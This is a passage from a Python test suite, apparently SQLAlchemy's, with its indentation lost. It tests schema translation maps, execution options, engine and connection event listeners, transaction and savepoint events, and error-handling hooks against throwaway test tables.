"bar": None,
}
metadata = MetaData()
Table("t1", metadata, Column("x", Integer))
Table("t2", metadata, Column("x", Integer), schema="foo")
Table("t3", metadata, Column("x", Integer), schema="bar")
conn = connection.execution_options(schema_translate_map=map_)
metadata.create_all(conn)
insp = inspect(connection)
is_true(insp.has_table("t1", schema=config.test_schema))
is_true(insp.has_table("t2", schema=config.test_schema))
is_true(insp.has_table("t3", schema=None))
conn = connection.execution_options(schema_translate_map=map_)
# if this test fails, the tables won't get dropped. so need a
# more robust fixture for this
metadata.drop_all(conn)
insp = inspect(connection)
is_false(insp.has_table("t1", schema=config.test_schema))
is_false(insp.has_table("t2", schema=config.test_schema))
is_false(insp.has_table("t3", schema=None))
def test_option_on_execute(self, plain_tables, connection):
# provided by metadata fixture provided by plain_tables fixture
self.metadata.create_all(connection)
map_ = {
None: config.test_schema,
"foo": config.test_schema,
"bar": None,
}
metadata = MetaData()
t1 = Table("t1", metadata, Column("x", Integer))
t2 = Table("t2", metadata, Column("x", Integer), schema="foo")
t3 = Table("t3", metadata, Column("x", Integer), schema="bar")
with self.sql_execution_asserter(connection) as asserter:
conn = connection
execution_options = {"schema_translate_map": map_}
conn._execute_20(
t1.insert(), {"x": 1}, execution_options=execution_options
)
conn._execute_20(
t2.insert(), {"x": 1}, execution_options=execution_options
)
conn._execute_20(
t3.insert(), {"x": 1}, execution_options=execution_options
)
conn._execute_20(
t1.update().values(x=1).where(t1.c.x == 1),
execution_options=execution_options,
)
conn._execute_20(
t2.update().values(x=2).where(t2.c.x == 1),
execution_options=execution_options,
)
conn._execute_20(
t3.update().values(x=3).where(t3.c.x == 1),
execution_options=execution_options,
)
eq_(
conn._execute_20(
select(t1.c.x), execution_options=execution_options
).scalar(),
1,
)
eq_(
conn._execute_20(
select(t2.c.x), execution_options=execution_options
).scalar(),
2,
)
eq_(
conn._execute_20(
select(t3.c.x), execution_options=execution_options
).scalar(),
3,
)
conn._execute_20(t1.delete(), execution_options=execution_options)
conn._execute_20(t2.delete(), execution_options=execution_options)
conn._execute_20(t3.delete(), execution_options=execution_options)
asserter.assert_(
CompiledSQL("INSERT INTO __[SCHEMA__none].t1 (x) VALUES (:x)"),
CompiledSQL("INSERT INTO __[SCHEMA_foo].t2 (x) VALUES (:x)"),
CompiledSQL("INSERT INTO __[SCHEMA_bar].t3 (x) VALUES (:x)"),
CompiledSQL(
"UPDATE __[SCHEMA__none].t1 SET x=:x WHERE "
"__[SCHEMA__none].t1.x = :x_1"
),
CompiledSQL(
"UPDATE __[SCHEMA_foo].t2 SET x=:x WHERE "
"__[SCHEMA_foo].t2.x = :x_1"
),
CompiledSQL(
"UPDATE __[SCHEMA_bar].t3 SET x=:x WHERE "
"__[SCHEMA_bar].t3.x = :x_1"
),
CompiledSQL(
"SELECT __[SCHEMA__none].t1.x FROM __[SCHEMA__none].t1"
),
CompiledSQL("SELECT __[SCHEMA_foo].t2.x FROM __[SCHEMA_foo].t2"),
CompiledSQL("SELECT __[SCHEMA_bar].t3.x FROM __[SCHEMA_bar].t3"),
CompiledSQL("DELETE FROM __[SCHEMA__none].t1"),
CompiledSQL("DELETE FROM __[SCHEMA_foo].t2"),
CompiledSQL("DELETE FROM __[SCHEMA_bar].t3"),
)
def test_crud(self, plain_tables, connection):
# provided by metadata fixture provided by plain_tables fixture
self.metadata.create_all(connection)
map_ = {
None: config.test_schema,
"foo": config.test_schema,
"bar": None,
}
metadata = MetaData()
t1 = Table("t1", metadata, Column("x", Integer))
t2 = Table("t2", metadata, Column("x", Integer), schema="foo")
t3 = Table("t3", metadata, Column("x", Integer), schema="bar")
with self.sql_execution_asserter(connection) as asserter:
conn = connection.execution_options(schema_translate_map=map_)
conn.execute(t1.insert(), {"x": 1})
conn.execute(t2.insert(), {"x": 1})
conn.execute(t3.insert(), {"x": 1})
conn.execute(t1.update().values(x=1).where(t1.c.x == 1))
conn.execute(t2.update().values(x=2).where(t2.c.x == 1))
conn.execute(t3.update().values(x=3).where(t3.c.x == 1))
eq_(conn.scalar(select(t1.c.x)), 1)
eq_(conn.scalar(select(t2.c.x)), 2)
eq_(conn.scalar(select(t3.c.x)), 3)
conn.execute(t1.delete())
conn.execute(t2.delete())
conn.execute(t3.delete())
asserter.assert_(
CompiledSQL("INSERT INTO __[SCHEMA__none].t1 (x) VALUES (:x)"),
CompiledSQL("INSERT INTO __[SCHEMA_foo].t2 (x) VALUES (:x)"),
CompiledSQL("INSERT INTO __[SCHEMA_bar].t3 (x) VALUES (:x)"),
CompiledSQL(
"UPDATE __[SCHEMA__none].t1 SET x=:x WHERE "
"__[SCHEMA__none].t1.x = :x_1"
),
CompiledSQL(
"UPDATE __[SCHEMA_foo].t2 SET x=:x WHERE "
"__[SCHEMA_foo].t2.x = :x_1"
),
CompiledSQL(
"UPDATE __[SCHEMA_bar].t3 SET x=:x WHERE "
"__[SCHEMA_bar].t3.x = :x_1"
),
CompiledSQL(
"SELECT __[SCHEMA__none].t1.x FROM __[SCHEMA__none].t1"
),
CompiledSQL("SELECT __[SCHEMA_foo].t2.x FROM __[SCHEMA_foo].t2"),
CompiledSQL("SELECT __[SCHEMA_bar].t3.x FROM __[SCHEMA_bar].t3"),
CompiledSQL("DELETE FROM __[SCHEMA__none].t1"),
CompiledSQL("DELETE FROM __[SCHEMA_foo].t2"),
CompiledSQL("DELETE FROM __[SCHEMA_bar].t3"),
)
def test_via_engine(self, plain_tables, metadata):
with config.db.begin() as connection:
metadata.create_all(connection)
map_ = {
None: config.test_schema,
"foo": config.test_schema,
"bar": None,
}
metadata = MetaData()
t2 = Table("t2", metadata, Column("x", Integer), schema="foo")
with self.sql_execution_asserter(config.db) as asserter:
eng = config.db.execution_options(schema_translate_map=map_)
with eng.connect() as conn:
conn.execute(select(t2.c.x))
asserter.assert_(
CompiledSQL("SELECT __[SCHEMA_foo].t2.x FROM __[SCHEMA_foo].t2")
)
class ExecutionOptionsTest(fixtures.TestBase):
def test_dialect_conn_options(self, testing_engine):
engine = testing_engine("sqlite://", options=dict(_initialize=False))
engine.dialect = Mock()
with engine.connect() as conn:
c2 = conn.execution_options(foo="bar")
eq_(
engine.dialect.set_connection_execution_options.mock_calls,
[call(c2, {"foo": "bar"})],
)
def test_dialect_engine_options(self, testing_engine):
engine = testing_engine("sqlite://")
engine.dialect = Mock()
e2 = engine.execution_options(foo="bar")
eq_(
engine.dialect.set_engine_execution_options.mock_calls,
[call(e2, {"foo": "bar"})],
)
def test_dialect_engine_construction_options(self):
dialect = Mock()
engine = Engine(
Mock(), dialect, Mock(), execution_options={"foo": "bar"}
)
eq_(
dialect.set_engine_execution_options.mock_calls,
[call(engine, {"foo": "bar"})],
)
def test_propagate_engine_to_connection(self, testing_engine):
engine = testing_engine(
"sqlite://", options=dict(execution_options={"foo": "bar"})
)
with engine.connect() as conn:
eq_(conn._execution_options, {"foo": "bar"})
def test_propagate_option_engine_to_connection(self, testing_engine):
e1 = testing_engine(
"sqlite://", options=dict(execution_options={"foo": "bar"})
)
e2 = e1.execution_options(bat="hoho")
c1 = e1.connect()
c2 = e2.connect()
eq_(c1._execution_options, {"foo": "bar"})
eq_(c2._execution_options, {"foo": "bar", "bat": "hoho"})
c1.close()
c2.close()
def test_get_engine_execution_options(self, testing_engine):
engine = testing_engine("sqlite://")
engine.dialect = Mock()
e2 = engine.execution_options(foo="bar")
eq_(e2.get_execution_options(), {"foo": "bar"})
def test_get_connection_execution_options(self, testing_engine):
engine = testing_engine("sqlite://", options=dict(_initialize=False))
engine.dialect = Mock()
with engine.connect() as conn:
c = conn.execution_options(foo="bar")
eq_(c.get_execution_options(), {"foo": "bar"})
class EngineEventsTest(fixtures.TestBase):
__requires__ = ("ad_hoc_engines",)
__backend__ = True
def teardown_test(self):
Engine.dispatch._clear()
Engine._has_events = False
def _assert_stmts(self, expected, received):
list(received)
for stmt, params, posn in expected:
if not received:
assert False, "Nothing available for stmt: %s" % stmt
while received:
teststmt, testparams, testmultiparams = received.pop(0)
teststmt = (
re.compile(r"[\n\t ]+", re.M).sub(" ", teststmt).strip()
)
if teststmt.startswith(stmt) and (
testparams == params or testparams == posn
):
break
def test_per_engine_independence(self, testing_engine):
e1 = testing_engine(config.db_url)
e2 = testing_engine(config.db_url)
canary = Mock()
event.listen(e1, "before_execute", canary)
s1 = select(1)
s2 = select(2)
with e1.connect() as conn:
conn.execute(s1)
with e2.connect() as conn:
conn.execute(s2)
eq_([arg[1][1] for arg in canary.mock_calls], [s1])
event.listen(e2, "before_execute", canary)
with e1.connect() as conn:
conn.execute(s1)
with e2.connect() as conn:
conn.execute(s2)
eq_([arg[1][1] for arg in canary.mock_calls], [s1, s1, s2])
def test_per_engine_plus_global(self, testing_engine):
canary = Mock()
event.listen(Engine, "before_execute", canary.be1)
e1 = testing_engine(config.db_url)
e2 = testing_engine(config.db_url)
event.listen(e1, "before_execute", canary.be2)
event.listen(Engine, "before_execute", canary.be3)
with e1.connect() as conn:
conn.execute(select(1))
eq_(canary.be1.call_count, 1)
eq_(canary.be2.call_count, 1)
with e2.connect() as conn:
conn.execute(select(1))
eq_(canary.be1.call_count, 2)
eq_(canary.be2.call_count, 1)
eq_(canary.be3.call_count, 2)
def test_emit_sql_in_autobegin(self, testing_engine):
e1 = testing_engine(config.db_url)
canary = Mock()
@event.listens_for(e1, "begin")
def begin(connection):
result = connection.execute(select(1)).scalar()
canary.got_result(result)
with e1.connect() as conn:
assert not conn._is_future
with conn.begin():
conn.execute(select(1)).scalar()
assert conn.in_transaction()
assert not conn.in_transaction()
eq_(canary.mock_calls, [call.got_result(1)])
def test_per_connection_plus_engine(self, testing_engine):
canary = Mock()
e1 = testing_engine(config.db_url)
event.listen(e1, "before_execute", canary.be1)
conn = e1.connect()
event.listen(conn, "before_execute", canary.be2)
conn.execute(select(1))
eq_(canary.be1.call_count, 1)
eq_(canary.be2.call_count, 1)
if testing.requires.legacy_engine.enabled:
conn._branch().execute(select(1))
eq_(canary.be1.call_count, 2)
eq_(canary.be2.call_count, 2)
@testing.combinations(
(True, False),
(True, True),
(False, False),
argnames="mock_out_on_connect, add_our_own_onconnect",
)
def test_insert_connect_is_definitely_first(
self, mock_out_on_connect, add_our_own_onconnect, testing_engine
):
"""test issue #5708.
We want to ensure that a single "connect" event may be invoked
*before* dialect initialize as well as before dialect on_connects.
This is also partially reliant on the changes we made as a result of
#5497, however here we go further with the changes and remove use
of the pool first_connect() event entirely so that the startup
for a dialect is fully consistent.
"""
if mock_out_on_connect:
if add_our_own_onconnect:
def our_connect(connection):
m1.our_connect("our connect event")
patcher = mock.patch.object(
config.db.dialect.__class__,
"on_connect",
lambda self: our_connect,
)
else:
patcher = mock.patch.object(
config.db.dialect.__class__,
"on_connect",
lambda self: None,
)
else:
patcher = util.nullcontext()
with patcher:
e1 = testing_engine(config.db_url)
initialize = e1.dialect.initialize
def init(connection):
initialize(connection)
with mock.patch.object(
e1.dialect, "initialize", side_effect=init
) as m1:
@event.listens_for(e1, "connect", insert=True)
def go1(dbapi_conn, xyz):
m1.foo("custom event first")
@event.listens_for(e1, "connect")
def go2(dbapi_conn, xyz):
m1.foo("custom event last")
c1 = e1.connect()
m1.bar("ok next connection")
c2 = e1.connect()
# this happens with sqlite singletonthreadpool.
# we can almost use testing.requires.independent_connections
# but sqlite file backend will also have independent
# connections here.
its_the_same_connection = (
c1.connection.dbapi_connection
is c2.connection.dbapi_connection
)
c1.close()
c2.close()
if add_our_own_onconnect:
calls = [
mock.call.foo("custom event first"),
mock.call.our_connect("our connect event"),
mock.call(mock.ANY),
mock.call.foo("custom event last"),
mock.call.bar("ok next connection"),
]
else:
calls = [
mock.call.foo("custom event first"),
mock.call(mock.ANY),
mock.call.foo("custom event last"),
mock.call.bar("ok next connection"),
]
if not its_the_same_connection:
if add_our_own_onconnect:
calls.extend(
[
mock.call.foo("custom event first"),
mock.call.our_connect("our connect event"),
mock.call.foo("custom event last"),
]
)
else:
calls.extend(
[
mock.call.foo("custom event first"),
mock.call.foo("custom event last"),
]
)
eq_(m1.mock_calls, calls)
def test_new_exec_driver_sql_no_events(self):
m1 = Mock()
def select1(db):
return str(select(1).compile(dialect=db.dialect))
with testing.db.connect() as conn:
event.listen(conn, "before_execute", m1.before_execute)
event.listen(conn, "after_execute", m1.after_execute)
conn.exec_driver_sql(select1(testing.db))
eq_(m1.mock_calls, [])
def test_add_event_after_connect(self, testing_engine):
# new feature as of #2978
canary = Mock()
e1 = testing_engine(config.db_url, future=False)
assert not e1._has_events
conn = e1.connect()
event.listen(e1, "before_execute", canary.be1)
conn.execute(select(1))
eq_(canary.be1.call_count, 1)
conn._branch().execute(select(1))
eq_(canary.be1.call_count, 2)
def test_force_conn_events_false(self, testing_engine):
canary = Mock()
e1 = testing_engine(config.db_url, future=False)
assert not e1._has_events
event.listen(e1, "before_execute", canary.be1)
conn = e1._connection_cls(
e1, connection=e1.raw_connection(), _has_events=False
)
conn.execute(select(1))
eq_(canary.be1.call_count, 0)
conn._branch().execute(select(1))
eq_(canary.be1.call_count, 0)
def test_cursor_events_ctx_execute_scalar(self, testing_engine):
canary = Mock()
e1 = testing_engine(config.db_url)
event.listen(e1, "before_cursor_execute", canary.bce)
event.listen(e1, "after_cursor_execute", canary.ace)
stmt = str(select(1).compile(dialect=e1.dialect))
with e1.connect() as conn:
dialect = conn.dialect
ctx = dialect.execution_ctx_cls._init_statement(
dialect, conn, conn.connection, {}, stmt, {}
)
ctx._execute_scalar(stmt, Integer())
eq_(
canary.bce.mock_calls,
[call(conn, ctx.cursor, stmt, ctx.parameters[0], ctx, False)],
)
eq_(
canary.ace.mock_calls,
[call(conn, ctx.cursor, stmt, ctx.parameters[0], ctx, False)],
)
def test_cursor_events_execute(self, testing_engine):
canary = Mock()
e1 = testing_engine(config.db_url)
event.listen(e1, "before_cursor_execute", canary.bce)
event.listen(e1, "after_cursor_execute", canary.ace)
stmt = str(select(1).compile(dialect=e1.dialect))
with e1.connect() as conn:
result = conn.exec_driver_sql(stmt)
eq_(result.scalar(), 1)
ctx = result.context
eq_(
canary.bce.mock_calls,
[call(conn, ctx.cursor, stmt, ctx.parameters[0], ctx, False)],
)
eq_(
canary.ace.mock_calls,
[call(conn, ctx.cursor, stmt, ctx.parameters[0], ctx, False)],
)
@testing.combinations(
(
([{"x": 5, "y": 10}, {"x": 8, "y": 9}],),
{},
[{"x": 5, "y": 10}, {"x": 8, "y": 9}],
{},
),
(({"z": 10},), {}, [], {"z": 10}),
argnames="multiparams, params, expected_multiparams, expected_params",
)
def test_modify_parameters_from_event_one(
self,
multiparams,
params,
expected_multiparams,
expected_params,
testing_engine,
):
# this is testing both the normalization added to parameters
# as of I97cb4d06adfcc6b889f10d01cc7775925cffb116 as well as
# that the return value from the event is taken as the new set
# of parameters.
def before_execute(
conn, clauseelement, multiparams, params, execution_options
):
eq_(multiparams, expected_multiparams)
eq_(params, expected_params)
return clauseelement, (), {"q": "15"}
def after_execute(
conn, clauseelement, multiparams, params, result, execution_options
):
eq_(multiparams, ())
eq_(params, {"q": "15"})
e1 = testing_engine(config.db_url)
event.listen(e1, "before_execute", before_execute, retval=True)
event.listen(e1, "after_execute", after_execute)
with e1.connect() as conn:
result = conn.execute(
select(bindparam("q", type_=String)), *multiparams, **params
)
eq_(result.all(), [("15",)])
@testing.provide_metadata
def test_modify_parameters_from_event_two(self, connection):
t = Table("t", self.metadata, Column("q", Integer))
t.create(connection)
def before_execute(
conn, clauseelement, multiparams, params, execution_options
):
return clauseelement, [{"q": 15}, {"q": 19}], {}
event.listen(connection, "before_execute", before_execute, retval=True)
connection.execute(t.insert(), {"q": 12})
event.remove(connection, "before_execute", before_execute)
eq_(
connection.execute(select(t).order_by(t.c.q)).fetchall(),
[(15,), (19,)],
)
def test_modify_parameters_from_event_three(
self, connection, testing_engine
):
def before_execute(
conn, clauseelement, multiparams, params, execution_options
):
return clauseelement, [{"q": 15}, {"q": 19}], {"q": 7}
e1 = testing_engine(config.db_url)
event.listen(e1, "before_execute", before_execute, retval=True)
with expect_raises_message(
tsa.exc.InvalidRequestError,
"Event handler can't return non-empty multiparams "
"and params at the same time",
):
with e1.connect() as conn:
conn.execute(select(literal("1")))
@testing.only_on("sqlite")
def test_dont_modify_statement_driversql(self, connection):
m1 = mock.Mock()
@event.listens_for(connection, "before_execute", retval=True)
def _modify(
conn, clauseelement, multiparams, params, execution_options
):
m1.run_event()
return clauseelement.replace("hi", "there"), multiparams, params
# the event does not take effect for the "driver SQL" option
eq_(connection.exec_driver_sql("select 'hi'").scalar(), "hi")
# event is not called at all
eq_(m1.mock_calls, [])
@testing.combinations((True,), (False,), argnames="future")
@testing.only_on("sqlite")
def test_modify_statement_internal_driversql(self, connection, future):
m1 = mock.Mock()
@event.listens_for(connection, "before_execute", retval=True)
def _modify(
conn, clauseelement, multiparams, params, execution_options
):
m1.run_event()
return clauseelement.replace("hi", "there"), multiparams, params
eq_(
connection._exec_driver_sql(
"select 'hi'", [], {}, {}, future=future
).scalar(),
"hi" if future else "there",
)
if future:
eq_(m1.mock_calls, [])
else:
eq_(m1.mock_calls, [call.run_event()])
def test_modify_statement_clauseelement(self, connection):
@event.listens_for(connection, "before_execute", retval=True)
def _modify(
conn, clauseelement, multiparams, params, execution_options
):
return select(literal_column("'there'")), multiparams, params
eq_(connection.scalar(select(literal_column("'hi'"))), "there")
def test_argument_format_execute(self, testing_engine):
def before_execute(
conn, clauseelement, multiparams, params, execution_options
):
assert isinstance(multiparams, (list, tuple))
assert isinstance(params, collections_abc.Mapping)
def after_execute(
conn, clauseelement, multiparams, params, result, execution_options
):
assert isinstance(multiparams, (list, tuple))
assert isinstance(params, collections_abc.Mapping)
e1 = testing_engine(config.db_url)
event.listen(e1, "before_execute", before_execute)
event.listen(e1, "after_execute", after_execute)
with e1.connect() as conn:
conn.execute(select(1))
conn.execute(select(1).compile(dialect=e1.dialect).statement)
conn.execute(select(1).compile(dialect=e1.dialect))
conn._execute_compiled(
select(1).compile(dialect=e1.dialect), (), {}, {}
)
def test_execute_events(self):
stmts = []
cursor_stmts = []
def execute(
conn, clauseelement, multiparams, params, execution_options
):
stmts.append((str(clauseelement), params, multiparams))
def cursor_execute(
conn, cursor, statement, parameters, context, executemany
):
cursor_stmts.append((str(statement), parameters, None))
# TODO: this test is kind of a mess
for engine in [
engines.testing_engine(options=dict(implicit_returning=False)),
engines.testing_engine(
options=dict(implicit_returning=False)
).connect(),
]:
event.listen(engine, "before_execute", execute)
event.listen(engine, "before_cursor_execute", cursor_execute)
m = MetaData()
t1 = Table(
"t1",
m,
Column("c1", Integer, primary_key=True),
Column(
"c2",
String(50),
default=func.lower("Foo"),
primary_key=True,
),
)
if isinstance(engine, Connection):
ctx = None
conn = engine
else:
ctx = conn = engine.connect()
trans = conn.begin()
try:
m.create_all(conn, checkfirst=False)
try:
conn.execute(t1.insert(), dict(c1=5, c2="some data"))
conn.execute(t1.insert(), dict(c1=6))
eq_(
conn.execute(text("select * from t1")).fetchall(),
[(5, "some data"), (6, "foo")],
)
finally:
m.drop_all(conn)
trans.commit()
finally:
if ctx:
ctx.close()
compiled = [
("CREATE TABLE t1", {}, None),
(
"INSERT INTO t1 (c1, c2)",
{"c2": "some data", "c1": 5},
(),
),
("INSERT INTO t1 (c1, c2)", {"c1": 6}, ()),
("select * from t1", {}, None),
("DROP TABLE t1", {}, None),
]
cursor = [
("CREATE TABLE t1", {}, ()),
(
"INSERT INTO t1 (c1, c2)",
{"c2": "some data", "c1": 5},
(5, "some data"),
),
("SELECT lower", {"lower_2": "Foo"}, ("Foo",)),
(
"INSERT INTO t1 (c1, c2)",
{"c2": "foo", "c1": 6},
(6, "foo"),
),
("select * from t1", {}, ()),
("DROP TABLE t1", {}, ()),
]
self._assert_stmts(compiled, stmts)
self._assert_stmts(cursor, cursor_stmts)
def test_options(self):
canary = []
def execute(conn, *args, **kw):
canary.append("execute")
def cursor_execute(conn, *args, **kw):
canary.append("cursor_execute")
engine = engines.testing_engine()
event.listen(engine, "before_execute", execute)
event.listen(engine, "before_cursor_execute", cursor_execute)
conn = engine.connect()
c2 = conn.execution_options(foo="bar")
eq_(c2._execution_options, {"foo": "bar"})
c2.execute(select(1))
c3 = c2.execution_options(bar="bat")
eq_(c3._execution_options, {"foo": "bar", "bar": "bat"})
eq_(canary, ["execute", "cursor_execute"])
@testing.requires.ad_hoc_engines
def test_generative_engine_event_dispatch(self):
canary = []
def l1(*arg, **kw):
canary.append("l1")
def l2(*arg, **kw):
canary.append("l2")
def l3(*arg, **kw):
canary.append("l3")
eng = engines.testing_engine(
options={"execution_options": {"base": "x1"}}
)
event.listen(eng, "before_execute", l1)
eng1 = eng.execution_options(foo="b1")
event.listen(eng, "before_execute", l2)
event.listen(eng1, "before_execute", l3)
with eng.connect() as conn:
conn.execute(select(1))
eq_(canary, ["l1", "l2"])
with eng1.connect() as conn:
conn.execute(select(1))
eq_(canary, ["l1", "l2", "l3", "l1", "l2"])
@testing.requires.ad_hoc_engines
def test_clslevel_engine_event_options(self):
canary = []
def l1(*arg, **kw):
canary.append("l1")
def l2(*arg, **kw):
canary.append("l2")
def l3(*arg, **kw):
canary.append("l3")
def l4(*arg, **kw):
canary.append("l4")
event.listen(Engine, "before_execute", l1)
eng = engines.testing_engine(
options={"execution_options": {"base": "x1"}}
)
event.listen(eng, "before_execute", l2)
eng1 = eng.execution_options(foo="b1")
event.listen(eng, "before_execute", l3)
event.listen(eng1, "before_execute", l4)
with eng.connect() as conn:
conn.execute(select(1))
eq_(canary, ["l1", "l2", "l3"])
with eng1.connect() as conn:
conn.execute(select(1))
eq_(canary, ["l1", "l2", "l3", "l4", "l1", "l2", "l3"])
canary[:] = []
event.remove(Engine, "before_execute", l1)
event.remove(eng1, "before_execute", l4)
event.remove(eng, "before_execute", l3)
with eng1.connect() as conn:
conn.execute(select(1))
eq_(canary, ["l2"])
@testing.requires.ad_hoc_engines
def test_cant_listen_to_option_engine(self):
from sqlalchemy.engine import base
def evt(*arg, **kw):
pass
assert_raises_message(
tsa.exc.InvalidRequestError,
r"Can't assign an event directly to the "
"<class 'sqlalchemy.engine.base.OptionEngine'> class",
event.listen,
base.OptionEngine,
"before_cursor_execute",
evt,
)
@testing.requires.ad_hoc_engines
def test_dispose_event(self, testing_engine):
canary = Mock()
eng = testing_engine(testing.db.url)
event.listen(eng, "engine_disposed", canary)
conn = eng.connect()
conn.close()
eng.dispose()
conn = eng.connect()
conn.close()
eq_(canary.mock_calls, [call(eng)])
eng.dispose()
eq_(canary.mock_calls, [call(eng), call(eng)])
def test_retval_flag(self):
canary = []
def tracker(name):
def go(conn, *args, **kw):
canary.append(name)
return go
def execute(
conn, clauseelement, multiparams, params, execution_options
):
canary.append("execute")
return clauseelement, multiparams, params
def cursor_execute(
conn, cursor, statement, parameters, context, executemany
):
canary.append("cursor_execute")
return statement, parameters
engine = engines.testing_engine()
assert_raises(
tsa.exc.ArgumentError,
event.listen,
engine,
"begin",
tracker("begin"),
retval=True,
)
event.listen(engine, "before_execute", execute, retval=True)
event.listen(
engine, "before_cursor_execute", cursor_execute, retval=True
)
with engine.connect() as conn:
conn.execute(select(1))
eq_(canary, ["execute", "cursor_execute"])
@testing.requires.legacy_engine
def test_engine_connect(self):
engine = engines.testing_engine()
tracker = Mock()
event.listen(engine, "engine_connect", tracker)
c1 = engine.connect()
c2 = c1._branch()
c1.close()
eq_(tracker.mock_calls, [call(c1, False), call(c2, True)])
def test_execution_options(self):
engine = engines.testing_engine()
engine_tracker = Mock()
conn_tracker = Mock()
event.listen(engine, "set_engine_execution_options", engine_tracker)
event.listen(engine, "set_connection_execution_options", conn_tracker)
e2 = engine.execution_options(e1="opt_e1")
c1 = engine.connect()
c2 = c1.execution_options(c1="opt_c1")
c3 = e2.connect()
c4 = c3.execution_options(c3="opt_c3")
eq_(engine_tracker.mock_calls, [call(e2, {"e1": "opt_e1"})])
eq_(
conn_tracker.mock_calls,
[call(c2, {"c1": "opt_c1"}), call(c4, {"c3": "opt_c3"})],
)
@testing.requires.sequences
@testing.provide_metadata
def test_cursor_execute(self):
canary = []
def tracker(name):
def go(conn, cursor, statement, parameters, context, executemany):
canary.append((statement, context))
return go
engine = engines.testing_engine()
t = Table(
"t",
self.metadata,
Column(
"x",
Integer,
Sequence("t_id_seq"),
primary_key=True,
),
implicit_returning=False,
)
self.metadata.create_all(engine)
with engine.begin() as conn:
event.listen(
conn, "before_cursor_execute", tracker("cursor_execute")
)
conn.execute(t.insert())
# we see the sequence pre-executed in the first call
assert "t_id_seq" in canary[0][0]
assert "INSERT" in canary[1][0]
# same context
is_(canary[0][1], canary[1][1])
def test_transactional(self):
canary = []
def tracker(name):
def go(conn, *args, **kw):
canary.append(name)
return go
engine = engines.testing_engine()
event.listen(engine, "before_execute", tracker("execute"))
event.listen(
engine, "before_cursor_execute", tracker("cursor_execute")
)
event.listen(engine, "begin", tracker("begin"))
event.listen(engine, "commit", tracker("commit"))
event.listen(engine, "rollback", tracker("rollback"))
with engine.connect() as conn:
trans = conn.begin()
conn.execute(select(1))
trans.rollback()
trans = conn.begin()
conn.execute(select(1))
trans.commit()
eq_(
canary,
[
"begin",
"execute",
"cursor_execute",
"rollback",
"begin",
"execute",
"cursor_execute",
"commit",
],
)
def test_transactional_named(self):
canary = []
def tracker(name):
def go(*args, **kw):
canary.append((name, set(kw)))
return go
engine = engines.testing_engine()
event.listen(engine, "before_execute", tracker("execute"), named=True)
event.listen(
engine,
"before_cursor_execute",
tracker("cursor_execute"),
named=True,
)
event.listen(engine, "begin", tracker("begin"), named=True)
event.listen(engine, "commit", tracker("commit"), named=True)
event.listen(engine, "rollback", tracker("rollback"), named=True)
with engine.connect() as conn:
trans = conn.begin()
conn.execute(select(1))
trans.rollback()
trans = conn.begin()
conn.execute(select(1))
trans.commit()
eq_(
canary,
[
("begin", set(["conn"])),
(
"execute",
set(
[
"conn",
"clauseelement",
"multiparams",
"params",
"execution_options",
]
),
),
(
"cursor_execute",
set(
[
"conn",
"cursor",
"executemany",
"statement",
"parameters",
"context",
]
),
),
("rollback", set(["conn"])),
("begin", set(["conn"])),
(
"execute",
set(
[
"conn",
"clauseelement",
"multiparams",
"params",
"execution_options",
]
),
),
(
"cursor_execute",
set(
[
"conn",
"cursor",
"executemany",
"statement",
"parameters",
"context",
]
),
),
("commit", set(["conn"])),
],
)
@testing.requires.savepoints
@testing.requires.two_phase_transactions
def test_transactional_advanced(self):
canary1 = []
def tracker1(name):
def go(*args, **kw):
canary1.append(name)
return go
canary2 = []
def tracker2(name):
def go(*args, **kw):
canary2.append(name)
return go
engine = engines.testing_engine()
for name in [
"begin",
"savepoint",
"rollback_savepoint",
"release_savepoint",
"rollback",
"begin_twophase",
"prepare_twophase",
"commit_twophase",
]:
event.listen(engine, "%s" % name, tracker1(name))
conn = engine.connect()
for name in [
"begin",
"savepoint",
"rollback_savepoint",
"release_savepoint",
"rollback",
"begin_twophase",
"prepare_twophase",
"commit_twophase",
]:
event.listen(conn, "%s" % name, tracker2(name))
trans = conn.begin()
trans2 = conn.begin_nested()
conn.execute(select(1))
trans2.rollback()
trans2 = conn.begin_nested()
conn.execute(select(1))
trans2.commit()
trans.rollback()
trans = conn.begin_twophase()
conn.execute(select(1))
trans.prepare()
trans.commit()
eq_(
canary1,
[
"begin",
"savepoint",
"rollback_savepoint",
"savepoint",
"release_savepoint",
"rollback",
"begin_twophase",
"prepare_twophase",
"commit_twophase",
],
)
eq_(
canary2,
[
"begin",
"savepoint",
"rollback_savepoint",
"savepoint",
"release_savepoint",
"rollback",
"begin_twophase",
"prepare_twophase",
"commit_twophase",
],
)
class FutureEngineEventsTest(fixtures.FutureEngineMixin, EngineEventsTest):
def test_future_fixture(self, testing_engine):
e1 = testing_engine()
assert e1._is_future
with e1.connect() as conn:
assert conn._is_future
def test_emit_sql_in_autobegin(self, testing_engine):
e1 = testing_engine(config.db_url)
canary = Mock()
@event.listens_for(e1, "begin")
def begin(connection):
result = connection.execute(select(1)).scalar()
canary.got_result(result)
with e1.connect() as conn:
assert conn._is_future
conn.execute(select(1)).scalar()
assert conn.in_transaction()
conn.commit()
assert not conn.in_transaction()
eq_(canary.mock_calls, [call.got_result(1)])
class HandleErrorTest(fixtures.TestBase):
__requires__ = ("ad_hoc_engines",)
__backend__ = True
def teardown_test(self):
Engine.dispatch._clear()
Engine._has_events = False
def test_handle_error(self):
engine = engines.testing_engine()
canary = Mock(return_value=None)
event.listen(engine, "handle_error", canary)
with engine.connect() as conn:
try:
conn.exec_driver_sql("SELECT FOO FROM I_DONT_EXIST")
assert False
except tsa.exc.DBAPIError as e:
ctx = canary.mock_calls[0][1][0]
eq_(ctx.original_exception, e.orig)
is_(ctx.sqlalchemy_exception, e)
eq_(ctx.statement, "SELECT FOO FROM I_DONT_EXIST")
def test_exception_event_reraise(self):
engine = engines.testing_engine()
class MyException(Exception):
pass
@event.listens_for(engine, "handle_error", retval=True)
def err(context):
stmt = context.statement
exception = context.original_exception
if "ERROR ONE" in str(stmt):
return MyException("my exception")
elif "ERROR TWO" in str(stmt):
return exception
else:
return None
conn = engine.connect()
# case 1: custom exception
assert_raises_message(
MyException,
"my exception",
conn.exec_driver_sql,
"SELECT 'ERROR ONE' FROM I_DONT_EXIST",
)
# case 2: return the DBAPI exception we're given;
# no wrapping should occur
assert_raises(
conn.dialect.dbapi.Error,
conn.exec_driver_sql,
"SELECT 'ERROR TWO' FROM I_DONT_EXIST",
)
# case 3: normal wrapping
assert_raises(
tsa.exc.DBAPIError,
conn.exec_driver_sql,
"SELECT 'ERROR THREE' FROM I_DONT_EXIST",
)
def test_exception_event_reraise_chaining(self):
engine = engines.testing_engine()
class MyException1(Exception):
pass
class MyException2(Exception):
pass
